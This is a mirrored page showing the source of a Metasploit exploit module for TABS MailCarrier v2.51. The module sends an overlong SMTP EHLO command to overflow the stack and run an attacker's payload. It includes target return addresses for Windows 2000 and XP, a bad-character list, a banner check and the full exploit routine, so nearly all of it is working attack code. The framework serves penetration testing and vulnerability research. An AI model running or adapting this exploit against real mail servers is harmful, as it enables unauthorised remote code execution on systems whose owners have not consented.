Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name'	=> 'TABS MailCarrier v2.51 SMTP EHLO Overflow',

16
        'Description'	=> %q{

17
          This module exploits the MailCarrier v2.51 suite SMTP service.

18
          The stack is overwritten when sending an overly long EHLO command.

19
        },

20
        'Author' => [ 'aushack' ],

21
        'License' => MSF_LICENSE,

22
        'References' => [

23
          [ 'CVE', '2004-1638' ],

24
          [ 'OSVDB', '11174' ],

25
          [ 'BID', '11535' ],

26
          [ 'EDB', '598' ],

27
        ],

28
        'Platform' => ['win'],

29
        'Arch'	=> [ ARCH_X86 ],

30
        'Privileged'	=> true,

31
        'DefaultOptions' => {

32
          'EXITFUNC' => 'thread',

33
        },

34
        'Payload' => {

35
          # 'Space'			=> 300,

36
          'BadChars' => "\x00\x0a\x0d:",

37
          'StackAdjustment'	=> -3500,

38
        },

39
        'Targets' => [

40
          # Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en.

41
          [ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63	} ], # jmp esp expsrv.dll w2ksp0 - xpsp1

42
          [ 'Windows XP SP2 - EN', { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en

43
        ],

44
        'DisclosureDate' => '2004-10-26',

45
        'DefaultTarget' => 0,

46
        'Notes' => {

47
          'Reliability' => UNKNOWN_RELIABILITY,

48
          'Stability' => UNKNOWN_STABILITY,

49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

50
        }

51
      )

52
    )

53


54
    register_options(

55
      [

56
        Opt::RPORT(25),

57
        Opt::LHOST(), # Required for stack offset

58
      ]

59
    )

60
  end

61


62
  def check

63
    connect

64
    banner = sock.get_once || ''

65
    disconnect

66


67
    if banner.to_s =~ /ESMTP TABS Mail Server for Windows NT/

68
      return Exploit::CheckCode::Detected

69
    end

70


71
    return Exploit::CheckCode::Safe

72
  end

73


74
  def exploit

75
    connect

76


77
    sploit = "EHLO " + rand_text_alphanumeric(5106 - datastore['LHOST'].length, payload_badchars)

78
    sploit << [target['Ret']].pack('V') + payload.encoded

79


80
    sock.put(sploit + "\r\n")

81


82
    handler

83
    disconnect

84
  end

85
end

86


87